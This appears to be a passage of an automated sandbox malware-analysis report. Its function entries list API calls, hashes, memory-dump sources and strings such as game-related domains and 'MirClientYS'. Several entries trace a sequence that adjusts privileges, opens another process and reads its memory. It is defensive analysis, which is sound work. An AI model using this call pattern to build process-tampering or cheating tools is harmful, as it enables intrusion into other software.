                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AddressHandleModuleProc
                                                                                                                                      • String ID: www.KKMir.com
                                                                                                                                      • API String ID: 1149923269-1689476394
                                                                                                                                      • Opcode ID: d518d7502bcfd7680300d0fd6d479bbd61064b2d50fa7d834278469370b11607
                                                                                                                                      • Instruction ID: 0d4f710204fe95a5df1f26ab5c6743b5f522e5acd671c6a8e44066ad036c64f4
                                                                                                                                      • Opcode Fuzzy Hash: d518d7502bcfd7680300d0fd6d479bbd61064b2d50fa7d834278469370b11607
                                                                                                                                      • Instruction Fuzzy Hash: 1631F9B65082406AD320D724AD46FEFB7DC9F84308F54892DF99DC7241EA749A0887E3
                                                                                                                                      Function 69EA0330 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA035E
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69EA039C
                                                                                                                                      • _memset.LIBCMT ref: 69EA03B3
                                                                                                                                      • _memset.LIBCMT ref: 69EA03D0
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID: game Module
                                                                                                                                      • API String ID: 1275148839-1822240276
                                                                                                                                      • Opcode ID: 7ca1ee5530e9f0b98a0a9d46dc01a84cade1b59b0dcb4a09710375e78acd5e82
                                                                                                                                      • Instruction ID: 2ac37fa9a0975109c252bd7592d022ff3789b0476d65caee710185c8e800f4fb
                                                                                                                                      • Opcode Fuzzy Hash: 7ca1ee5530e9f0b98a0a9d46dc01a84cade1b59b0dcb4a09710375e78acd5e82
                                                                                                                                      • Instruction Fuzzy Hash: 5921F8B5608340ABE321D724ED51FEF77DCAF89308F40982DA99887151E6309A0CC7E3
                                                                                                                                      Function 69EA0620 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA064E
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69EA0686
                                                                                                                                      • _memset.LIBCMT ref: 69EA06A3
                                                                                                                                      • _memset.LIBCMT ref: 69EA06C0
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID: http://www.xm2m2.com
                                                                                                                                      • API String ID: 1275148839-1391355098
                                                                                                                                      • Opcode ID: 390941da09328f9492e756f9223d88684e54e18f17f4bdf48b639b2fe0e9263c
                                                                                                                                      • Instruction ID: 8b2dc79f38cc6d0951f88478f6dc4e1106e82b3253d4fe3c41479a20f1f589e2
                                                                                                                                      • Opcode Fuzzy Hash: 390941da09328f9492e756f9223d88684e54e18f17f4bdf48b639b2fe0e9263c
                                                                                                                                      • Instruction Fuzzy Hash: 6B21D3B5508384ABD321D7249D51FEFB7DCAF99308F44882DB99887291E6309A0CC7E3
                                                                                                                                      Function 69E9F900 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9F92E
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69E9F96C
                                                                                                                                      • _memset.LIBCMT ref: 69E9F983
                                                                                                                                      • _memset.LIBCMT ref: 69E9F9A0
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID: http://www.Haom6.com
                                                                                                                                      • API String ID: 1275148839-2633146352
                                                                                                                                      • Opcode ID: 7c52427810604c1fc15eef56448fcc2bc913a7d5af9a0010126696fc49e6f02f
                                                                                                                                      • Instruction ID: 6fc040d1d4dc7fd384e4aae2ba907dd48b017e31ff94cc546cb57bd191693925
                                                                                                                                      • Opcode Fuzzy Hash: 7c52427810604c1fc15eef56448fcc2bc913a7d5af9a0010126696fc49e6f02f
                                                                                                                                      • Instruction Fuzzy Hash: B721F4B5508380ABD321D6689D41FEFBBDC9B89308F54892DB99887141E6309A08C7E3
                                                                                                                                      Function 69E9FEE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9FF0E
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69E9FF4C
                                                                                                                                      • _memset.LIBCMT ref: 69E9FF63
                                                                                                                                      • _memset.LIBCMT ref: 69E9FF80
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID: MirClientYS
                                                                                                                                      • API String ID: 1275148839-30130738
                                                                                                                                      • Opcode ID: bbbac83ab4c79c5ede791712c8fdaaa256ac91a5dc9f6bdb0b47c89de6002a98
                                                                                                                                      • Instruction ID: 7aab44f803ab390fea2bebc00cd4df52c19716be7cc13c0dfe78bc2e44c606ad
                                                                                                                                      • Opcode Fuzzy Hash: bbbac83ab4c79c5ede791712c8fdaaa256ac91a5dc9f6bdb0b47c89de6002a98
                                                                                                                                      • Instruction Fuzzy Hash: 1621C7B5508344AAD321D6149D51FDB77DCAB86308F40881DB99CC7141E7349A0CC7E3
                                                                                                                                      Function 69E831D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E8320A
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,69E8381D,000000FF,?), ref: 69E8321C
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E83223
                                                                                                                                      • _strncpy.LIBCMT ref: 69E83264
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_strncpy
                                                                                                                                      • String ID: C:\pl.txt
                                                                                                                                      • API String ID: 2532819045-85274317
                                                                                                                                      • Opcode ID: 56803e88b420beb10017191ccc9f42a710bf98702c46fce76a2eef3464f0de7b
                                                                                                                                      • Instruction ID: d9aca752fd6ddd717545e2b25252c41ecd2b4252d972bc6f50d8fe5295b276f4
                                                                                                                                      • Opcode Fuzzy Hash: 56803e88b420beb10017191ccc9f42a710bf98702c46fce76a2eef3464f0de7b
                                                                                                                                      • Instruction Fuzzy Hash: EA11C17B6052049BC710CA9CEE4087BF3A9EFC9765B345A5EF85987310DB32F8098691
                                                                                                                                      Function 69E83110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_strncpy
                                                                                                                                      • String ID: C:\pl.txt
                                                                                                                                      • API String ID: 2532819045-85274317
                                                                                                                                      • Opcode ID: 3a7b0ee46d6fddd6c578a020462767369441691b4ef9d1a13aea6cce9a533c58
                                                                                                                                      • Instruction ID: ee9c845aa808fa2cdb6498f7ed781bbeba752e51a71cc22f9030e700ca9915b0
                                                                                                                                      • Opcode Fuzzy Hash: 3a7b0ee46d6fddd6c578a020462767369441691b4ef9d1a13aea6cce9a533c58
                                                                                                                                      • Instruction Fuzzy Hash: 23112C356052009BDB05C694CF50B7A73E5AF86B4CF34649DD85D8B309EF35D40AC741
                                                                                                                                      Function 69EB6E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 69EB6EB1
                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 69EB6EC9
                                                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 69EB6ED0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                                      • String ID: B$DISPLAY
                                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                                      • Opcode ID: 53cf84692cab3d5a472e609b9c6509f2ab4e9b5691469e6fe9c8b589972e3a23
                                                                                                                                      • Instruction ID: f48b25b99701e0b127d9ee0deda8ca01a8bd1657ead98cda0c83aa98c246864d
                                                                                                                                      • Opcode Fuzzy Hash: 53cf84692cab3d5a472e609b9c6509f2ab4e9b5691469e6fe9c8b589972e3a23
                                                                                                                                      • Instruction Fuzzy Hash: A5110672D40325EBDF028FA4DD84A5BBBA8FF06B64B208025FE15AE149D371D901CBE0
                                                                                                                                      Function 69E9DC20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9DC48
                                                                                                                                        • Part of subcall function 69E9DB40: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9DB63
                                                                                                                                        • Part of subcall function 69E9DB40: _memset.LIBCMT ref: 69E9DB7A
                                                                                                                                        • Part of subcall function 69E9DB40: Process32First.KERNEL32 ref: 69E9DB90
                                                                                                                                        • Part of subcall function 69E9DB40: CloseHandle.KERNEL32(00000000), ref: 69E9DB9A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                      • String ID: .$l$olp$p
                                                                                                                                      • API String ID: 113637525-2661486703
                                                                                                                                      • Opcode ID: d7fd0959e687deef09435bc4b7b21650454969b68e9e6d3ceb202e0ab0446d69
                                                                                                                                      • Instruction ID: 385740259b6fe6989bab6e929a0db4282dec986d615da720a3ed746a9a2c10a0
                                                                                                                                      • Opcode Fuzzy Hash: d7fd0959e687deef09435bc4b7b21650454969b68e9e6d3ceb202e0ab0446d69
                                                                                                                                      • Instruction Fuzzy Hash: 84216D2500C3D19ED312CB289444BDBBFE86F96248F18C99DF4D88B242D275D60CCBA3
                                                                                                                                      Function 69EA0DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9D870: _memset.LIBCMT ref: 69E9D8F4
                                                                                                                                        • Part of subcall function 69E9D870: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 69E9D906
                                                                                                                                        • Part of subcall function 69E9D870: Module32First.KERNEL32 ref: 69E9D920
                                                                                                                                        • Part of subcall function 69E9D870: Module32Next.KERNEL32(00000000,?), ref: 69E9D979
                                                                                                                                        • Part of subcall function 69E9D870: CloseHandle.KERNEL32(00000000), ref: 69E9D983
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA0DF5
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA0E23
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
